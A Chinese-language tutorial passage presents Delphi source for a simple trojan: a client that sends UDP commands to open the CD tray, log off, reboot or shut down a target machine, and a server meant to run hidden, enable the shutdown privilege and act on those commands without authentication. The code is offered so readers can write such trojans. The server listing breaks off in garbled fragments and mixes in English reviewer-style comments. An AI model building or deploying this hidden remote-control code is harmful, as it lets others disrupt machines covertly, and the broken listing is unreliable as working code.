后面的文章将详细讨论关于木马、远程控制软件和病毒(严格意义上的病毒并不包含木马程序)的一些异同,以及合法程序改造成木马、嵌套木马等问题;
目的是希望大家了解木马、熟悉木马技术,破除神秘感,能够手工清除木马,甚至能够编写木马程序——知己知彼,百战不殆。
-------------------------------------------------------------------
§控制端§
§发现未知病毒§
Client端源码:
//----------------------------------------------------------------
//
//
//
//
unit MainFrm;
interface
uses
Windows, Messages, SysUtils, Variants, Classes, Graphics, Controls, Forms,
Dialogs, StdCtrls, IdBaseComponent, IdComponent, IdUDPBase, IdUDPClient;
type
// Controller form: an operator types a target host and UDP port, then presses
// one button per remote command. Each Click handler below sends exactly one
// fixed command string through SendCmd; nothing is read back in this unit.
TfrmMain = class(TForm)
  edtHost: TEdit;              // target host (name or address) typed by the operator
  edtPort: TEdit;              // target UDP port as text; parsed with StrToInt in SendCmd
  lblHost: TLabel;
  Label2: TLabel;
  btnOpen_CDROM: TButton;      // sends 'Open_CDROM'
  btnClose_CDROM: TButton;     // sends 'Close_CDROM'
  btnLoginOff: TButton;        // sends 'LoginOff'
  btnReboot: TButton;          // sends 'Reboot'
  btnShutDown: TButton;        // sends 'ShutDown'
  lblCmd: TLabel;
  edtCmd: TEdit;               // declared but not used by any handler in this listing
  IdUDPClient1: TIdUDPClient;  // Indy UDP client that carries the command datagram
  procedure btnOpen_CDROMClick(Sender: TObject);
  procedure btnClose_CDROMClick(Sender: TObject);
  procedure btnLoginOffClick(Sender: TObject);
  procedure btnRebootClick(Sender: TObject);
  procedure btnShutDownClick(Sender: TObject);
private
  // Declaration: shared command-sending procedure. Sets IdUDPClient1.Host/Port
  // from AHost/APort and sends CmdStr as the datagram payload (cleartext, no
  // authentication of either end is performed in this unit).
  procedure SendCmd(AHost, APort, CmdStr:string);
  { Private declarations }
public
  { Public declarations }
end;
var
  // Global form instance; presumably created by Application.CreateForm in the
  // project file (.dpr), which is not part of this listing.
  frmMain: TfrmMain;
implementation
{$R *.dfm}
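procedure TfrmMain.SendCmd(AHost, APort, CmdStr: string);
// Implementation: shared command-sending procedure.
// Sends CmdStr as a single UDP datagram to AHost:APort via IdUDPClient1.
//   AHost  - target host name or address (edtHost.Text at the call sites).
//   APort  - target port as text (edtPort.Text). StrToInt raises EConvertError
//            on non-numeric input; the added range check raises the same
//            exception type for a numeric value outside 1..65535 instead of
//            handing an out-of-range port to Indy.
//   CmdStr - the command name the server matches against its command list.
// Nothing is read back: UDP gives no delivery confirmation, and the payload is
// the cleartext command name with no sender authentication in this unit.
var
  PortNum: Integer;
begin
  PortNum := StrToInt(APort);
  if (PortNum < 1) or (PortNum > 65535) then
    raise EConvertError.CreateFmt('Port out of range: %s', [APort]);
  IdUDPClient1.Host := AHost;
  IdUDPClient1.Port := PortNum;
  IdUDPClient1.Send(CmdStr);
end;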
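procedure TfrmMain.btnOpen_CDROMClick(Sender: TObject);
// Button handler: sends the fixed command 'Open_CDROM' to the host and port
// currently typed into edtHost/edtPort. Sender is unused.
// Any exception raised by SendCmd (e.g. EConvertError from a bad port string)
// propagates to the VCL's default handler.
begin
  SendCmd(edtHost.Text, edtPort.Text, 'Open_CDROM');
end;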
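procedure TfrmMain.btnClose_CDROMClick(Sender: TObject);
// Button handler: sends the fixed command 'Close_CDROM' to the host and port
// currently typed into edtHost/edtPort. Sender is unused.
// Exceptions from SendCmd propagate to the VCL's default handler.
begin
  SendCmd(edtHost.Text, edtPort.Text, 'Close_CDROM');
end;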
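procedure TfrmMain.btnLoginOffClick(Sender: TObject);
// Button handler: sends the fixed command 'LoginOff' to the host and port
// currently typed into edtHost/edtPort. Sender is unused.
// Exceptions from SendCmd propagate to the VCL's default handler.
begin
  SendCmd(edtHost.Text, edtPort.Text, 'LoginOff');
end;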
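procedure TfrmMain.btnRebootClick(Sender: TObject);
// Button handler: sends the fixed command 'Reboot' to the host and port
// currently typed into edtHost/edtPort. Sender is unused.
// Exceptions from SendCmd propagate to the VCL's default handler.
begin
  SendCmd(edtHost.Text, edtPort.Text, 'Reboot');
end;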
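procedure TfrmMain.btnShutDownClick(Sender: TObject);
// Button handler: sends the fixed command 'ShutDown' to the host and port
// currently typed into edtHost/edtPort. Sender is unused.
// Exceptions from SendCmd propagate to the VCL's default handler.
begin
  SendCmd(edtHost.Text, edtPort.Text, 'ShutDown');
end;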
end.
//----------------------------------------------------------------
Server端源码:
注:在工程文件的 Application.Run; 语句前添加Application.ShowMainForm:=False; 语句以使程序运行时隐藏窗体;
并创建互斥对象,避免二次运行;
//----------------------------------------------------------------
//
//
//
//
unit MainFrm;
interface
uses
Windows, Messages,
SysUtils, Variants, Classes, Graphics, Controls, Forms,
Dialogs, IdBaseComponent, IdComponent, IdUDPBase, IdUDPServer, IdSocketHandle,
MMSystem, ShellAPI;
type
// Server form. The note above the listing says the project file should set
// Application.ShowMainForm := False before Application.Run, so this form is
// not expected to be visible at runtime.
TfrmMain = class(TForm)
  IdUDPServer1: TIdUDPServer;  // listening UDP socket; each datagram is handed to IdUDPServer1UDPRead
  // Receives one datagram (AData) from ABinding and dispatches on the command
  // string it contains. The event wiring to IdUDPServer1's OnUDPRead is in the
  // .dfm, which is not part of this listing. No check of the sender's address
  // is visible in the part of the handler shown below — confirm in the full source.
  procedure IdUDPServer1UDPRead(Sender: TObject; AData: TStream;
    ABinding: TIdSocketHandle);
private
  // Declaration: enables SeShutdownPrivilege on the current process token
  // (required by the OS before a shutdown/reboot request is honoured).
  procedure GetPrivilege;
  { Private declarations }
public
  { Public declarations }
end;
var
  // Global form instance; presumably created by Application.CreateForm in the
  // project file (.dpr), which is not part of this listing.
  frmMain: TfrmMain;
implementation
{$R *.dfm}
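procedure TfrmMain.GetPrivilege;
// Enables SeShutdownPrivilege in the current process token. Windows requires
// this privilege to be enabled before a shutdown/reboot request succeeds.
// Best-effort, like the original: no exception is raised if any step fails.
// Two things are changed from the original:
//   - the token is opened with only the access AdjustTokenPrivileges needs
//     (TOKEN_ADJUST_PRIVILEGES or TOKEN_QUERY) rather than TOKEN_ALL_ACCESS;
//   - the token handle is closed in a finally block (the original opened a
//     handle on every call and never released it).
var
  NewState: TTokenPrivileges;
  lpLuid: Int64;
  ReturnLength: DWord;
  TokenHandle: Cardinal;
begin
  if not OpenProcessToken(GetCurrentProcess,
                          TOKEN_ADJUST_PRIVILEGES or TOKEN_QUERY,
                          TokenHandle) then
    Exit;  // cannot get a token handle; nothing to adjust or release
  try
    if not LookupPrivilegeValue(nil, 'SeShutdownPrivilege', lpLuid) then
      Exit;  // privilege name unknown on this system; leave the token as is
    NewState.PrivilegeCount := 1;
    NewState.Privileges[0].Luid := lpLuid;
    NewState.Privileges[0].Attributes := SE_PRIVILEGE_ENABLED;
    ReturnLength := 0;
    // No previous-state buffer is requested (nil, 0), so only ReturnLength is
    // touched by the call. The result is deliberately not inspected: a token
    // that was never granted the privilege simply stays unchanged.
    AdjustTokenPrivileges(TokenHandle, False, NewState, 0, nil, ReturnLength);
  finally
    CloseHandle(TokenHandle);
  end;
end;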
procedure TfrmMain.IdUDPServer1UDPRead(Sender: TObject; AData: TStream;
//读取内存流数据
ABinding: TIdSocketHandle);
var
ReadCmd:TStringList;
//定义接受命令字符串列表
CmdList:TStringList;
//定义命令列表
begin
ReadCmd:=TStringList.Create;
//创建接受命令字符串列表
CmdList:=TStringList.Create;
//创建命令字符串列表
try
CmdList.Add('Open_CDROM');
CmdList.Add('Close_CDROM');
CmdList.Add('LoginOff');
CmdList.Add('Reboot');
CmdList.Add('ShutDown');
ReadCmd.LoadFromStream(AData);
//从内存流中取得数据
case CmdList.IndexOf(ReadCmd.Strings[0]) of
0: mciSendString('Set CDAudio door open wait',nil,0,handle);
//打开光驱
var
begin
end;
end.
//----------------------------------------------------------------